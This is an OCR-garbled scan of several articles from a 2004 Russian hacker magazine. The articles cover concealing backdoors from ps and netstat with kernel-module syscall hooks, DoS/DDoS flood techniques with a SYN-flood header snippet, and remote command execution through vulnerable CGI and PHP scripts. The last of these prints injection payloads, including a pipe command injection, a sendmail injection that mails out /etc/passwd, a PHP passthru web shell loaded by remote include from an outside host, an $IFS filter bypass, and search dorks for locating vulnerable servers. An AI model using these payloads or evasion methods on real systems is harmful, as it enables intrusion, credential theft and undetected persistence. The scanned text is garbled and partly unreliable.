и забыть об идее остаться незамечен- 
ным :). Не все так печально. Неспрос- 
та же изворотливый хакерский ум 
изобрел огромное количество спосо- 
бов сокрытия присутствия лазейки от 
любого, даже самого хитрого админа. 


ПРЯЧЕМ ПРОЦЕСС И ФАЙЛ 

и Алгоритмы сокрытия бэкдора от 
утилит ps и Is практически идентичны, 
поэтому я разберу только случай мас- 
кировки процесса. Надеюсь, что с 
маскировкой сайла у тебя трудностей 
не возникнет. 


Кажется, что проще бэкдор 
удалить и забыть об идее остаться 


незамеченным .). 


Есть ощущение, что администрато- 
ры смотрят первым делом именно в 
вывод утилиты PS, когда у них возни- 
кает подозрение, что их системой 
пользуется тот, кто не имеет права 
этого делать. Наша задача сделать 


а 


be 
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так, чтобы админ не обнаружил в 
списке процессов ничего подозри- 
тельного. Есть множество способов 
решить эту задачу, но мы рассмотрим 
самые популярные. 

Первый способ заключается в кор- 
ректировке исходного кода утилиты, 
ответственной за вывод списка про- 
цессов. То есть мы должны будем 
найти сорцы рз, в них обнаружить 
функцию, которая выводит процессы 
на экран, и путем недолгих преобра- 
зований заставить забыть ее о нашем 
бэкдоре. Трудностей встретится целая 
куча: во-первых, придется рыться в 
чужих сорцах, а хуже, чем копаться в 
исходных кодах системных юниксо- 
вых утилит, ничего не придумаешь; 
во-вторых, реализация для каждой 
*nix-CUCTeMbI будет новая, ибо я сом- 
неваюсь, что PS везде одинаковая. 


LOADABLE KERNEL MODULE 


Также можно воспользоваться gpy- 
гим приемом, состоящим в маскиров- 
ке созданного бэкдором процесса. 
Это самый простой в реализации 
способ. Потребуется написать прог- 
рамму, полностью заменяющую ps, 
которая выплевала бы всегда один и 
тот же текст. После взлома запомним 
список "постоянно висящих" процес- 
сов, запишем его, например, в файл, 
который и будем выводить всякий 
раз при запуске утилиты. Примене- 
ние данного способа не требует от 


мировании, хватит и школьного кур- 
са. Ведь в программу всего то и надо, 
что понапихать функций рип О. 
Жаль только, что любой нормаль- 
ный админ в здравом уме и трезвой 
памяти заподозрит неладное сразу 
же после второго запуска ps. 

Ну и, наконец, самый интересный 
способ. Когда утилита ps пытается 
вывести все запущенные в данный 
момент в системе процессы, она об- 
ращается к ядру с некоторым систем- 
ным запросом. Анализируя ответ яд- 
ра, она составляет список и выбра- 
сывает его на экран. Способ маски- 
ровки бэкдора в данном случае бу- 
дет заключаться в «обработке» это- 
го самого системного ответа. 

Грубо говоря, требуется перехва- 
тить системный вызов и подменить 
его на фальшивый, в котором будут 
отсутствовать всяческие данные о 
нашем бэкдоре. Осуществить это 
можно, написав Loadable Kernel 
Module (LKM), модуль, подгружае- 
мый к ядру системы. Он подменит за- 
пись в таблице системных вызовов, 
в результате чего все запросы будут 
передаваться не стандартной функ- 
ции, выдающей список процессов, а 
нашей хитрой процедурке. Похожий 
модуль был написан ${ап'ом из ко- 
манды unlOck team, но, к сожалению, 
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хакера глубоких познаний в програм- 


он не захотел делиться с народом » 


Требуется перехватить 
системный вызов и подменить 
его на фальшивый. 
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НЕПРИСТУПНЫЙ 


Е взлом | невидимостьв»мх ) 


ОСТИ С ДЕМОНАМИ 


Не стоит 
забывать, 
что любой, 
даже самый 
хороший 
бэкдор мо- 
жет выдать 
свое прису- 
тствие ог- 
ромным 
трафиком. 


Перехват 
системных 
вызовов - 
самый ува- 
жаемый в 


полноценной программой, поэтому 
написал некий РоС, который застав- 
ляет программу ps и ей подобные 
выводить сообщение о том, что в 
системе процессов нет как таковых. 
Немного подкорректировав код мо- 
дуля (ты найдешь его Ha CD, прила- 
гающемся к журналу) и добавив в 
него функцию поиска и сокрытия 
нужного нам процесса, можно 90- 
биться самой качественной маски- 
ровки своего бэкдора. 

Достоинства этого способа оче- 
видны. Администратор не сможет 
обнаружить никаких изменений в 
размере файла утилиты ps, как в 
случае с ее подменой. А если Bgpyr 
он воспользуется какой-нибудь сто- 
ронней программой для слежения 
за запущенными процессами, то и 
ее вызов не выдаст нашего бэкдо- 
ра, ибо ядро одно, а работают по- 
добные программки по одному и то- 
му же принципу. Здорово! ИИ 


хакерских 
кругах спо- 
соб сокры- 
тия бэкдора 
от утилит 
операцион- 
ной систе- 
мы. 


Впрочем, у этого метода есть и не- 


Администратор не сможет обнаружить Esra Beg srocunenvcae 
никаких изменений в размере файла кой (КМ или подкорректировать уже 
ути п ИТЫ ps имеющийся на врезке, нужно нехило 


разбираться в программировании мо- 
дулей, а этим может похвастаться да- 
леко не каждый программер. 


orien | 
ттт 


ЕЕ РЕЕ 


Думаю, с сокрытием процесса бэк- 
gopa, а также файла, маскировка 
которого реализуется по аналогии, 
мы разобрались, и можно присту- 
пить к самой ответственной части 
материала. 


ПРЯЧЕМ СОЕДИНЕНИЕ 

Каждому юниксоиду известно, что 
для просмотра списка открытых сое- 
динений в системе применяется ути- 
лита netstat. Если будет использован 

ых ь обычный бэкдор, который открывает 

pag repose : шелл на заданном ТСР-порту, первый 
a —.__ РОННИ же запуск этой программки выдаст 
aap Sees взломщика с головой. Kak же укрыть- 
ся от netstat? Аналогично ситуации с 
PS, способов очень много. 

Один из них, как это ни парадоксаль- 
но, очень популярный, заключается в 
такой корректировке самой утилиты, 
которая бы не позволяла ей показы- 
вать наше соединение. Для реализа- 
ции этого способа потребуется отыс- 
кать сорцы netstat в сети и как Cnegy- 
ет их перелопатить. По-моему, такое 


и в кошмарном сне не приснится. 
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МНОГО БЭКДОРОВ, ХОРОШИХ И РАЗНЫХ 


Другой способ - написать LKM, кото- 
рый бы перехватывал системные вы- 
зовы утилиты netstat. Это вообще са- 
мый лучший подход к редактирова- 
нию вывода любых системных утилит, 
будь то ps или netstat. Он немного 
сложен в реализации, но, если знать, 
куда копать - какие системные вызо- 
вы в каких случаях перехватывать, то 
справиться можно. 

Допустим, нам удалось скрыть бэк- 
дор из списка открытых соединений. 
А что, если администратор проверя- 
ет свою систему не локально, а, нап- 
ример, удаленно с помощью различ- 
ных программ вроде птар? Тогда 
при сканировании администратор 
заметит, что в системе открыт "ле- 
вый" порт, а netstat его не показы- 
вает. Админ сразу же просечет 
фишку, и больше мы на его машину 
не попадем. Именно для таких слу- 
чаев хакеры придумали еще кое-что 
для сокрытия своего присутствия в 
системе. При написании бэкдора 
следует использовать не 
SOCK_STREAM, а SOCK_RAW, то есть 
вместо ТСР-сокетов юзать RAW-co- 
кеты. Красивый способ: КА\\/-сокеты 
позволяют слушать весь входящий 
трасрик, а это дает нам огромные 
возможности. Например, мы можем 
сделать так, чтобы после посылки 
определенного пакета бэкдор откры- 
вал шелл на определенном порту. 
Примеры подобных бэкдоров - на 


МАСКИРУЕМ ТРАФИК 

Грамотный администратор не 
всегда ограничивается стандартными 
средствами при поиске бэкдора в сво- 
ей системе. Иногда он прибегает к по- 
иску злоумышленника с помощью 
снифера или IDS, подобной Снорту. А 
от зоркого глаза (или чуткого носа? :)) 
“нюхача"” не скроется ни один даже 
самый навороченный бэкдор. 

Как же уберечься от надоедливо- 
го админа и его кошмарной 105? Тут 
поможет только одно - полное 
шифрование Tpacpuka, которое убе- 
рет заметный plain text команд из 
логов снифера. Хакеры используют 
для этого самые разные криптоалго- 
ритмы: и IDEA, и ХТЕА, и Blowfish, и 
Twofish. 

Ho, даже шифруясь, не стоит 3a- 
бывать, что лишний гигабайт тра- 
фика, генерируемый к тому же ка- 
ким-нибудь RAW-cokeTOM, заметит 
даже слепой админ. При использо- 
вании чужих мощностей надо 
знать меру :). 


НАПОСЛЕДОК 

В этой статье я описал лишь са- 
мые популярные подходы к маски- 
ровке. Время не стоит на месте, пос- 
тоянно изобретаются все новые и но- 
вые способы сокрытия бэкдоров. Ста- 
райся не отставать от прогресса, 
ведь не просто так говорят: "Кто ос- 
тановился, тот умер!" 
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НЕПРИСТУПНЫЙ 


Утилита 
сгоп помо- 
жет обхит- 
рить адми- 
нистратора. 


Умный ag- 
мин может 
регулярно 
считать 
МО5-хэши 
от всех 
файлов в 
системе. Он 
без труда 
может за- 
метить из- 
менения в 
системных 
утилитах. 


40 DOS/DDOS, ИЛИ АТАКА ГРУБОЙ СИЛЫ ) 


рмолаев Евгений aka Saturn (saturn@lin 


Если сервер 
атакует 
одна 
«точка», то 
он вполне 
может 
закрыться 
от нее 
фаерволом. 


фик, направляемый на жертву. Если 
для крупной западной фирмы это ме- 
лочь, то для небольшой отечествен- 
ной домашней сети средняя атака мо- 
жет грозить разорением. Кроме огром- 
ного вреда, наносимого жертве, такие 
нападения отличаются простотой и ог- 
ромной эврофективностью. Против них 
нет стопроцентной защиты. Именно 
названные выше сракторы привлека- 
ют к DoS внимание специалистов по 
сетевой безопасности и... DoS'epos. 


ПРИНЦИП РАБОТЫ 

и Для того чтобы обнаружить, a YK 
тем более организовать DoS/DDoS-ata- 
ку, нужно разобраться в ее принципах. 
Эти атаки не направлены на получение 
доступа к ресурсам или к важной ин- 
срормации. Атака DoS делает ресурс 
недоступным для использования пу- 
тем нарушения его нормальной рабо- 
ты. Атаку на отказ в обслуживании 
можно провести всего двумя способа- 
ми: использовав уязвимости в програ- 
ммном обеспечении жертвы и при по- 
мощи отсылки большого количества 
определенно составленных сетевых 
пакетов (флуд). Первый способ состо- 
ит в том, чтобы, используя уязвимости 
типа переполнения бусфера, отослать 
код, выполняющий 005 на сервере. 
Поскольку атака будет проводиться 
"изнутри", то через очень короткое 
время объект зависнет или будет отк- 
лючен от интернета. Этот способ не 
требует больших вычислительных ре- 
сурсов нападающего, однако такая 


ХАКЕРСПЕЦ | 10(47) [2004 


дается в приложении ума. Идея состо- 
ит в том, чтобы переслать как можно 
больше "кривых" запросов серверу 
(впрочем, не только "кривых": от ог- 
ромного количества нормальных паке- 
тов, например СЕТ-запросов для НТТР- 
сервера хосты падают с таким же успе- 
хом). Дело в том, что при получении 
сервером пакета данных происходит его 
обработка. Если приходит пакет, но сер- 
вер занят приемом или обработкой gpy- 
гого пакета, то вновь приходящий зап- 
рос ставится в очередь, занимая при 
этом часть ресурсов системы. При про- 
ведении DoS-ataku серверу отсылается 
большое количество пакетов опреде- 
ленного размера. При этом ответ серве- 
ра не ожидается (обычно адрес отпра- 
вителя сфальсиффицируется - спуффинг). 
В результате, из-за того что сервер ока- 
зывается перегружен инсрормацией, он 
либо отключается от интернета, либо 
зависает. В любом случае, нормальные 
пользователи некоторое время (иногда 
довольно продолжительное) не могут 
пользоваться услугами пострадавшего 
сервера. Просто и со вкусом :). Однако 
если сервер атакует одна "точка", он 
вполне может закрыться от нее cpaep- 
Bonom. Кроме того, для проведения ка- 
чественной DoS-aTakn необходима go- 
вольно высокая пропускная способ- 
ность канала. Поэтому атака на отказ в 
обслуживании в большинстве случаев 
проводится сразу с нескольких машин. 
Атака, в проведении которой участвует 
много машин (обычно это затрояненные 
десктопы, их называют "зомби"), полу- 
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= крайне мало действительно полезной информации. В основном доступны лишь поверхностные описания удачных 
атак или негодования пострадавших. Этот материал поможет тебе разобраться в DoS/DDoS-aTakax. 
. 
ЦЕЛЬ ШИ 
ш Основная цель < 
DoS/DDOS-arak - вывес- Главной особенностью DDOS-atak 
Е eevee является то, что для них не существует 
состояния. Конечно, в С и i 
большинстве случаев глобальная ата- сервера, которыи нельзя завалить. 
ка приводит к большим дфинансовым 
потерям со стороны атакуемого. Нап- 
ример, если какой-либо коммерческий атака предполагает использование чила название DDOS (Distributed Denial 
сайт упадет Ha несколько часов, то это уязвимостей, что само по себе услож- of Service). Для сколь угодно мощного 
нанесет вред бизнесу, а если на неде- няет задачу. Поскольку никто не хочет сервера всегда можно подобрать доста- 
лю, то владелец ресурса вполне мо- излишне заморачиваться, в народе бо- точное количество зомбиков (благо ды- 
IRC = самый жет разориться. Или взять локальные лее популярен второй способ, которо- рявых систем и ушастых юзверей по ми- 
ponent сети. Дело в том, что одним из эфорек- му мы и уделим основное внимание. ру много развелось). 
спосо! : > a 
управления тов популярных атак на Denial of Это пример применения простой гру. Есть несколько способов получения 
троянами Service (DOS) является огромный тра- бой силы, которая практически не нуж- "зомби". Во-первых, это массовое 


внедрение трояна на компьютеры мир- 
ных пользователей. Самый популяр- 
ный способ управления троянами - 
IRC, то есть организация ботнета. При 
посылке определенных команд троян 
активируется и мирный домашний 
компьютер (с широкополосным выхо- 
дом в интернет) становится источни- 
ком большого количества мусора, съе- 
дающего ресурсы атакуемого сервера. 

Чтобы более детально разобраться 
в DoS-aTakax, рассмотрим их наиболее 
известные разновидности. Выделяют 
пять наиболее популярных: 

- TCP SYN Flood; 

- TCP flood; 

- Ping of Death; 

- ICMP flood; 

- UDP flood. 


TCP SYN FLOOD И TCP FLOOD 

и Основная цель этого вида атак - 
превысить ограничение на количе- 
ство соединений, которые находят- 
ся в состоянии установки. В резуль- 
тате, система не может устанавли- 
вать новые соединения. После этого 
каждый дополнительный запрос 
еще сильнее увеличивает нагрузку. 
Для того чтобы достичь желаемого 
результата, при проведении атаки 
направляется большое количество 
запросов на инициализацию ТСР- 
соединения с потенциальной жерт- 
вой. Такие атаки не нуждаются в об- 
ратной связи с атакующим, и поэто- 
му можно не использовать настоя- 
щий адрес источника. 


Ниже приведен пример установки 3a- 
головка IP пакета, который можно ис- 
пользовать в атаке типа "SYN Flood". 


packet.ip.version=4; // Версия 

packet.ip.ihl=5; // Длина заголовка 
packet.ip.tos=0; // Тип сервиса 
packet.ip.tot_len=htons(40); // Общая длина 
packet.ip.id=getpid(); // Идентификатор 
packet.ip.frag_off=0; // Смещение фрагмента 
packet.ip.ttl=255; // Время жизни 
packet.ip.protocol=IPPROTO_TCP; // Протокол 
packet.ip.check=0; // Контрольная сумма 
packet.ip.saddr=saddress; // Адрес источника 
packet.ip.daddr=daddress; // Адрес назначения 


TCP flood - это вид атаки, при котором 
потенциальной жертве отправляется 
множество ТСР-пакетов, что приводит 
к связыванию системных ресурсов. 

Следующие виды DoS-aTak основа- 
ны на совершенно другом принципе. 
При помощи таких атак можно пере- 
полнить сеть или отдельно взятую 
мишень абсолютно бесполезными 
ping-naketamn. Для реализации cnegy- 
ющих видов атаки достаточно нес- 
кольких строк кода. Итак, это атаки, 
основанные на протоколе ICMP: 


PING OF DEATH И ICMP FLOOD 

и Большое количество DoS-atak ос- 
новывается на протоколе ICMP. Некото- 
рые его функции могут быть полезны 
для создания нападений такого рода. 

ICMP flood - это далеко не новый вид 
атаки, который, тем не менее, не теря- 
ет популярности. Здесь используется 
ping. Ping изначально задумывался 
для проверки качества соединения с 
удаленным компьютером. Принцип ра- 
боты следующий: программа отсылает 
некое сообщение, на которое удален- 
ный компьютер автоматически отве- 
чает. Вроде бы все нормально. OgHa- 
ко при атаке используются большие 
(64 кБ), сильно фрагментированные 
1СМР-пакеты. При получении таких па- 
кетов удаленная машина зависает. 

Ping of Death основывается Ha ICMP 
flood, однако усиливает атаку за счет 
того, что ртд-запросы пересылаются 
по адресу широковещательной рас- 
сылки. Используемый в пакетах зап- 
роса адрес - это адрес атакуемого сер- 
вера. Получившие такие "посылки 


Схема работы FloodGuard (системы 
защиты) 


на сайт Microsoft, He 
имела такого "успе- 
ха" у пользователей. 
@. Серверы 
Osirusoft крупнейше- 
го хранилища [Р-ад- 
ресов, замеченных в 
спаме, были отключе- 
ны после большого 
количества распреде- 
ленных атак на отказ 
в обслуживании. 
Данная служба зани- 
малась ведением ди- 
намического списка 


Еще одна схема атаки: на сей раз при использовании "зомби". |Р-адресов, замечен- 


смерти" системы отвечают на них и 
забивают жертву. Это очень серьез- 
ный вид атаки, который, правда, тре- 
бует длительной подготовки. Требует- 
ся много "зомби", необходимо соб- 
рать достаточное количество инфор- 
мации о жертве и посредниках. 


UDP FLOOD 

и Это наиболее опасный вид атаки. 
УОР-сервис одной машины генериру- 
ет последовательность символов для 
каждого получаемого системой паке- 
та. Делается это в целях тестирова- 
ния. Далее связывается с еспо-серви- 
сом другой машины, которая повторя- 
ет эти символы. В результате, переда- 
ется большое количество UDP-nake- 
тов с подделанным IP источника. Ос- 
новная проблема для защиты состоит 
в том, что протокол УБР не устанавли- 
вает соединения и нет никаких инди- 
каторов состояния, чтобы помочь 
межсетевой защите выявить нападе- 
ние. Чтобы с большей долей вероят- 
ности избежать такой атаки, нужно 
удалить все ненужные УОР-сервисы, 
а остальным сервисам использовать 
механизм прокси-сервера. 


САМЫЕ МОЩНЫЕ 
DOS/DDOS-ATAKH 

и Теперь ты знаешь, что собой 
представляет атака на отказ в обслу- 
живании. Пришло время составить 
небольшой хит-парад DoS/DDoS-arTak. 

@. Пожалуй, самой нашумевшей 
атакой из разряда DoS стала атака 
на корневые DNS-cepBepa, произо- 
шедшая в ноябре 2002 года. Тогда 
распределенной атаке подверглись 
все 13 DNS-cepBepoB, семь из кото- 
рых вышли из строя. Только высо- 
кий уровень избыточности в структу- 
ре интернета позволил избежать за- 
держек при обращении к ресурсам. 

©. Атака на сайт SCO, совершенная 
при помощи вируса MyDoom и всех 
его подцепивших. 22 августа 2003 го- 
ga сайт компании SCO перестал отве- 
чать на запросы пользователей. Атака 
продолжалась несколько дней и прек- 
ратилась только 25 августа. Посколь- 
ку вирус Мубоот имел очень широ- 
кое распространение, то атака получи- 
лась мощнейшей. Вторая редакция ви- 
руса MyDoom.B, созданная для атаки 


ных в спаме. 

Атаки на отказ в обслуживании, не- 
сомненно, большое зло на просторах 
интернета. И если отдельно взятую 
пользовательскую машину можно за- 
щитить с помощью фаервола, то для 
серверов стопроцентной защиты нет и 
в скором времени не предвидится. Так 
что с DoS/DDoS-atakamn сложилась 
довольно грустная (или веселая? :)) 
ситуация. Многие хостеры при обнару- 
жении атаки просто выключают серве- 


ра. Это о чем-го говорит ;). 
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Способы подключения к жертве(2 вида атаки) 
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: ОТЫЩИ И ВЫПОЛНИ! ) 


Докучаев Дмитрий aka Forb (forb@real.xakep.ru) 


OTbILLUM 
И ВЫПОЛНИ: 


УДАЛЕННОЕ ВЫПОЛНЕНИЕ КОМАНД 


акеры способны атаковать сервер со всех сторон. Взломщик может использовать эксплоит или поразить сервер 

командой, выполненной через дырявый сценарий. НТТР-демон является самой опасной стороной сервера, которая 
скрывает за собой возможность интерпретирования практически любой *nix-KOMaHgbI. Об этом и многом другом ты 
прочтешь в данном материале. 


ТАК МНОГО 


способов 


По умолча- 
нию, дирек- 
тива 
allow_url_fo 
pen разре- 
шена. Это 
означает, 
что функ- 
ция fopen() 
способна 
подгрузить 
любой уда- 
ленный 
скрипт. 


В РНР так- 
же можно 
произвести 
атаку на 
system(). 
Для этого 
необходимо 
поставить 
tau по кра- 
ям перемен- 
ной, а саму 
переменную 
представить 
в виде ко- 
манды. 


м На самом деле, ут- 
верждение, что удален- 
но выполнять команды можно только 
через Web, ошибочно. Любой рабо- 
чий эксплоит, нацеленный на бажный 
сервис, способен выполнить какое-ли- 
бо действие. Это может быть добавле- 
ние пользователя, запуск интерпрета- 
тора и т.д. Важно то, что сам факт пе- 
реполнения буфера приводит к фа- 
тальной ошибке и, как следствие, к 
удачному выполнению команды. Я бы 
с удовольствием раскрыл все тайны 
переполнения, но это уже было сде- 
лано в Спеце #08.04(45), посвящен- 
ном дырявым буферам. 

Второй способ - атака через Web. 
На тысячах Web-cepBeposB крутятся 
миллионы бажных сценариев, через 
которые можно выполнять систем- 
ные запросы. Некоторые админы не 
исправляют уязвимые сценарии, так 
как надеются на фаервол, но грамот- 
ный взломщик может влегкую отк- 
лючить брандмауэр даже через Web- 
лазейку. Я расскажу о самых извест- 
ных уязвимостях в ССИРНР-скрип- 
тах, эксплуатация которых приводит 
к фатальным последствиям. 


АТАКА HA ПАЙПЫ 

и Начнем с самой популярной 
ошибки программистов. Баг таится в 
функции Open(), которая есть в каж- 
дом более-менее серьезном сцена- 
рии. Суть ошибки состоит в следую- 
щем: функции передается имя фай- 
ла, который необходимо прочитать 
и вывести на экран. Само имя посту- 
пает с входа СС|-потока, то есть 3a- 
дается удаленным пользователем 
как параметр скрипта. Всем извест- 
но, что ореп() понимает символ пе- 
ренаправления (пайп) "|". Если этот 
символ встретится перед именем 
или после имени, функция попыта- 
ется обратиться к файлу и выпол- 
нить его как команду! Хакеру доста- 
точно изменить параметр скрипта 
на команду и обрамить ее верти- 
кальными палочками. 


ХАКЕРСПЕЦ | 10(47) [2004 


Рассмотрим это на наглядном приме- 
ре. Пусть в сценарии юзается следую- 
щий код: 


') 


Sfile=param(‘file 


f 
open(FILENAME, ); 
while(<FILENAME>) { print } 
close(FILENAME); 


Мы видим, что переменная Sfile 
поступает с потоком данных. Она не 
проверяется на наличие каких-либо 
спецсимволов, поэтому хакер без 
проблем может добавить в перемен- 
ную парочку пайпов. При нестанда- 
ртном запросе в ореп() поступит пе- 
ременная "|id|", которая выполнится 
как команда, а результат будет выве- 
ден на экран. Не думай, что этих 
скриптов мало - по статистике, каж- 
дый третий сервер можно атаковать 
таким тривиальным запросом. 


SYSTEM() ПОГУБИТ МИР 

m Как известно, функция system() 
предназначена для выполнения сис- 
темных команд. Изредка ее использу- 
ют в СС|-сценариях, запуская внеш- 
ние приложения. Ничего страшного 
не происходит, если системный зап- 
рос не содержит пользовательских 
параметров скрипта. В противном слу- 
чае злоумышленник может добиться 
выполнения произвольной команды. 
Рассмотрим пример бажного кода. 
Проект, из которого он позаимство- 
ван, и по сей день находится в онлай- 
не, его код удалось выцепить после 
успешного эксплуатирования ошибки. 


#!/usr/bin/perl 


HHH Simply Perl-Whoiser by 


w(:standard); 
1(‘host'); 


ise CGI 4 


log"); 


После того как скрипт получил пара- 
метр host, он выполняет System() с 
этой опцией безо всякой проверки 
символов. Стоит атакующему подста- 
вить в переменную Shost (читай: в па- 
раметр скрипта host) символ ";', а за 


ним произвольную команду, как в 
фрайл log поместится уже не ответ би- 
нарника /usr/bin/whois, а команда 
взломщика. К примеру, запрос вида 
http://victim.com/whois.cgi?host=blabla.ru;id no- 
кажет текущего пользователя (TO есть 
пользователя, с правами которого вы- 
полняются СС|-скрипты на сервере). 


SENDMAIL - ВРАГ НАРОДА 

и Я не могу не упомянуть про ста- 
рый добрый баг в вызове sendmail, 
который до сих пор можно отыскать 
в тухлых скриптах. Ошибка заключа- 
ется в использовании опции -t. Этот 
параметр позволяет указывать имя 
получателя в командной строке. 
Часто при таком раскладе это имя 
берется из входных данных CGI- 
скрипта и не проверяется на спец- 
символы. Вот фрагмент кода уязви- 
мой гостевой книги: 


use CGI qw(:standard): 

Semail=param(‘email'); 

open(MAIL,"|/usr/sbin/sendmail -t 
Semail"); 

print MAIL "From: admin@victim.com\n": 

print MAIL "Subject: Thanks\n\nThank 


you!\n" 


Как видно, переменная Semail нико- 
им образом не проверяется, что мо- 
жет привести к нежелательным пос- 
ледствиям. Стоит только указать на 
странице e-mail в виде 
amer@xakep.ru|cat /etc/passwd, и 
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Эксплуатирование system() 


взломщику на мыло придет письмо с 
вложенным passwd. И все это из-за 
халатности или безграмотности прог- 
раммиста. 

Чтобы не возникало подобных ситу- 
аций, нужно отказаться от ключика -, 
а адрес получателя оформлять после 
вызова sendmail. Также необходимо 
проверять входные переменные на 
предмет лишних символов. Вот qppar- 
мент кода, закрывающего баг: 


die print "Incorrect address!\n" if 
(Semail=~/[\|:1/ || Semail~!/\@/); 

open(MAIL,"|/usr/sbin/sendmail"); 

print MAIL "To: Зетай\п"; 

Fe ts 


0 БЕДНОМ INCLUDE 
ЗАМОЛВИТЕ СЛОВО 

и Теперь поговорим о РНР-сценари- 
ях. В них также встречаются серьез- 
ные ошибки. Самой хитовой из них 
можно считать include-yASBUMOCTb. 
Часто администраторы включают оп- 
цию register_globals в положение Оп. 
При этом все параметры, переданные 
сценарию, автоматически интерпрети- 
руются в переменные. С одной сторо- 
ны, это очень удобно: кодер может 
без лишних проблем писать скрипты. 
А содругой стороны, никто не мешает 


злоумышленнику выполнить произ- 


Письмо с аккаунтами 


НЕ БОЛЬШЕ ОДНОГО СЛОВА! 


вольный системный код на системе. 
Для этого достаточно создать не- 
большой срайл megahack.php Ha лю- 
бом сервере (хотя поддержки РНР там 
нет, в противном случае файлу при- 
дется дать другое расширение, так 
как с расширением .php при обраще- 
нии к файлу он будет интерпретиро- 
ваться сервером как скрипт, а в дан- 
ной ситуации необходимо, чтобы сер- 
вер просто выдал его содержимое) и 
подсунуть URL файла уязвимому 
скрипту. Файл может быть таким: 


<?php 
passthru Scmd 
?> 


Функция include помогает nogrpy- 
зить в скрипт любой cpaiin (аналогич- 
но директиве #include препроцессора 
BC): 


<?php 

$... 

include Smy_include . "рр" 
Я... 

?> 


В данном случае программист даже 
не представляет, что вместо его люби- 
мого data.php (если в Smy_include хра- 
нится строка 'data') может подгрузить- 
ся хакерский data.php, находящийся 
на далеком уругвайском сервере по 
адресу hitp://urugwayhost/data.pho (правда, 
для этого необходимо, чтобы у РНР 
директива allow_url_fopen была вклю- 
чена, но чаще всего так и бывает). Ес- 
ли все условия выполнены, взломщик 
вставляет в запрос дополнительный 
параметр "my_include" и присваивает 
ему значение URL своего скрипта (без 


Ш Бывают случаи, когда команда выполняется, но скрипт нещадно 
отрезает все ее аргументы. Получается, что хакер имеет право 
вставить всего одно слово в запрос. Из этой, казалось бы, неиз- 
бежной ситуации есть выход: вместо пробела нужно подставить 
пустую переменную окружения SIFS. Таким образом, запрос вида 
http://victim.com/bug.cgi?file=unameSIFS-a способен обойти жест- 


кую проверку. 
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Обход ограничения 


Уязвимый include у ног хакера 


" php" на конце). Например, запрос, 
выполняющий команду Is, выглядит 
следующим образом: 


http://victim/view.php?my_include=http:// 
urugwayhost/data&cmde=ls. 


В случае если админ запретил отк- 
рытие ссылок в fopen(), можно соста- 
вить РНР-код и поместить его в ката- 
nor /tmp: для этого стоит воспользо- 
ваться FTP или другой уязвимостью, 
позволяющей создавать на сервере 
файлы. В качестве параметра взлом- 
щик укажет путь к локальному файлу 
(например, /tmp/data). 


оттянись по полной! 

п "Ну и где найти все это добро?" - 
спросишь ты. Конечно, на поискови- 
ках! Например, с помощью Гугла 
можно отыскать РНР-скрипт, содер- 
жащий include-6ar. Для этого можно 
воспользоваться запросом вида "file- 
type:php Не=". В итоге поисковик по- 
кажет все РНР-сценарии с перемен- 
ной file. Я уверен, что добрая их по- 
ловина "болеет" include-6arom. 

Если хочется найти СС!-скрипт с 
ошибкой в ореп(), можно использо- 
вать конструкцию "filetype:cgi htm!" 
или "Не уре:р! html. В ответ мы полу- 
чим массу сценариев с расширением 
.cgi или .р! соответственно, подключа- 
ющих html-cpainbl. Именно в них со- 
держится бажный код без проверки 
переменных на наличие пайпов. 

В заключение замечу, что взлом че- 
рез WWW - дело творческое, к каждо- 
му сценарию необходим индивиду- 
альный подход. Только тогда взлом- 
щик сможет чего-то добиться. Но на- 
чинать надо с поиска простых ошибок 
- багов в open), юреп0, system() и 
других аналогичных функциях. Пос- 
тигнув азы, ты продвинешься далее и 
сможешь анализировать скрипт, даже 
при отсутствии его исходников. Нуж- 
но лишь стремление и опыт, а осталь- 
ное приложится. 
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Если в 
СИшном ко- 
де програм- 
миста забо- 
тит явление 
переполне- 
ния буфера, 
то Web-pas- 
работчика в 
первую оче- 
редь долж- 
ны волно- 
вать пара- 
метры, пе- 
редаваемые 
СС1-сцена- 
рию. 


Ничто не 
мешает ха- 
керу залить 
эксплоит 
через Web, 
получить 
рутовые 
права и на- 
сильно отк- 
лючить фа- 
ервол. 
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рмолаев Евгений aka Saturn (saturn@linkin-park.ru) 


ЯДРА - ЧИСТЫЙ 


ИЗУМРУД 


«ЯДЕРНЫЕ» ПРОБЛЕМЫ В *NIX 


ь. 


ебе, наверное, много раз приходилось слышать, что любая *nix - это некая "идеальная" система (в отличие OT 
Windows), которая не зависает, не тормозит и т.д. Так ли это на самом деле? Поскольку надежность любой 
операционной системы зависит от ядра, давай обратим внимание именно на эту часть ОС. 


ля начала следует ра- 


зобраться С ОСНОВНЫМИ 


понятиями *пих-систем. 


Это очень важный мо- 
мент, без которого go- 
вольно сложно разобраться в струк- 
туре системы и ядре. Ядро полностью 
скрывает специфику компьютера от 
пользователя, но в то же время зави- 
сит от этой специфики. 


OCHOBbI 

m= Первое, с чем нам предстоит 
столкнуться, - понятие пользовате- 
ля. Здесь пользователь - это некто 
(нечто), имеющий свою учетную за- 
пись, состоящую из имени и пароля 
и еще некоторых данных, например, 
домашней директории. Ядро UNIX 
"узнает" пользователя по UID (User 
IDentifier) - идентификатору, KOTO- 
рый представляет собой уникальное 
целое число, присваемое при регист- 
рации (автоматически или вручную 
админом). Пользователь относится к 
некой группе, определяемой GID'om 
(Group IDentifier). Администратору 
системы отводится нулевой UID. 
Пользователь с таким UID называет- 
ся root (рут). Это наиболее интерес- 
ный персонаж, поскольку он имеет 
полный контроль над системой. Иде- 
альный вариант использования ка- 
кой-либо уязвимости для захвата 
системы - получение прав рута. 

Любой пользователь в процессе ра- 
боты так или иначе обращается к 
файлам, и здесь нельзя избежать 
упоминания о файловой системе 
(MC). 

ФС присуща древовидная структу- 
ра, совершенно непривычная для 
пользователя DOS (Windows). Корне- 
вой каталог всегда имеет имя "/". Но 
это не значит, что в *пх возможно ис- 
пользование только одного устрой- 
ства для хранения информации. "Кус- 
ки" файлового дерева системы чаще 
всего размещаются на разных носите- 
лях, но логически это одна система. 
Каждый зарегистрированный пользо- 
ватель имеет так называемую домаш- 
нюю директорию. В ней пользователь 
- царь и бог :). Теоретически юзер мо- 
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жет получить доступ ко всем файлам 
в системе. Но такой доступ ограничен 
посредством привилегий. В отличие 
от MS-DOS у ФС *nix отсутствует Ta- 
кое понятие, как расширение файла 
(имя файла может содержать точку 
наравне с другими допустимыми сим- 
волами). 

Кроме того, для файловых систем 
*nix характерна защита информации 
в файлах и трактовка периферийных 
устройств как файлов. 


АРХИТЕКТУРА 
"ТРАДИЦИОННОГО" ЯДРА 

и В *nix есть ядро, которое управля- 
ет ресурсами компьютера и предос- 
тавляет пользователям некий ограни- 
